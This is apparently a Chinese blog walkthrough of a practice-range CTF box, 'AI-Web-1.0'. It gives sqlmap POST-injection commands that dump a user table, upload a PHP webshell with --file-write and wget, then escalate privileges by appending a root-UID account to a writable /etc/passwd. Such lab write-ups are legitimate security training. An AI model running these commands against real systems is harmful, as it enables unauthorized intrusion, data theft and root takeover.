云尘靶场-AI-Web-1.0

还是先用fscan来扫c段

访问一下/robots.txt

访问一下看看 ,不能访问

删掉/upload

输个1 试试

1' 发现报错了

这里我们可以发现是post传参,那么sqlmap执行POST注入的方式

利用sqlmap进行POST注入_sqlmap post-CSDN博客

这里检查网络,看请求,可以看到传参

放到sqlmap

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid

说明存在sql注入

>sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --dbs

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 --tables

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid -D aiweb1 -T systemUser --dump --fresh-queries

这里没有flag,也不懂有什么用

访问另一个看看

也是打不开,用dirsearch扫一下看看

--os-shell

sqlmap --os-shell 原理详解_ZredamanJ的博客-CSDN博客

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --os-shell

--file-write

语法:

复制代码
--file-write 木马文件 --file-dest 存放目录

sqlmap.py -u http://172.25.0.13/se3reTdir777 --data="uid=1&Operation=Submit" -p uid --file-write E:\123.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/123.php

可以通过--os-shell 来检查一下是否上传成功

发现上传成功

那么我们可以通过蚁剑来连接了

我以为这里就有flag了,但是并没有

复制代码
python3 -m http.server 8888

打开终端我们可以发现我们的权限只是/www/data的权限

这里上传文件还看到别的方法,也来学习1下

wegt

本机开启web服务

复制代码
python -m http.server 8888

因为我们的一句话木马在e盘下

所以我们在e盘下开启服务

open vpn里面有现在的ip

或者直接ipconfig

去kali的地址wget 123.php

wget http://10.8.0.206:8888/123.php

成功了

提权

学习一下如何提权

回到蚁剑的终端

复制代码
ls -l /etc/passwd

我们发现,当前用户对/etc/passwd有着读写权限r

通过 openssl passwd手动生成密码

openssl passwd 手动生成密码------passwd提权-CSDN博客

复制代码
openssl passwd -1 -salt hack 123456

root密码

复制代码
root:x:0:0:root:/root:/bin/bash

x为密码 就是上面生成的
复制代码
hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0:root:/root:/bin/bash

那我们通过echo写入

复制代码
echo 'hack:$1$hack$.JxSX4bOP1WSqH0kCgs9Y.:0:0::/root:/bin/bash' >> /etc/passwd

不能直接sudo hack 会报错

我们使用py命令

复制代码
python -c 'import pty;pty.spawn("/bin/bash")'

但是报错了说,没有成功

没事学到东西就可以了

相关推荐
恋猫de小郭14 分钟前
Flutter Riverpod 3.0 发布,大规模重构下的全新状态管理框架
android·前端·flutter
wordbaby15 分钟前
用 window.matchMedia 实现高级响应式开发:API 全面解析与实战技巧
前端·javascript
薄雾晚晴20 分钟前
Rspack 实战,构建流程升级:自动版本管理 + 命令行美化 + dist 压缩,一键输出生产包
前端·javascript
huabuyu24 分钟前
在 Taro 小程序中实现完整 Markdown 渲染器的实践
前端
Running_slave26 分钟前
位运算左移右移应该怎么玩?
前端·javascript·算法
晚星star26 分钟前
在 Web 前端实现流式 TTS 播放
前端·vue.js
huabuyu26 分钟前
基于 Taro 的 Markdown AST 渲染器实现
前端
薄雾晚晴27 分钟前
Rspack 性能优化实战:JS/CSS 压缩 + 代码分割,让产物体积直降 40%
前端·javascript
本末倒置18327 分钟前
前端面试高频题:18个经典技术难点深度解析与解决方案
前端·vue.js·面试
狗头大军之江苏分军1 小时前
Meta万人裁员亲历者自述:小扎尝到了降本的甜头
前端·后端·github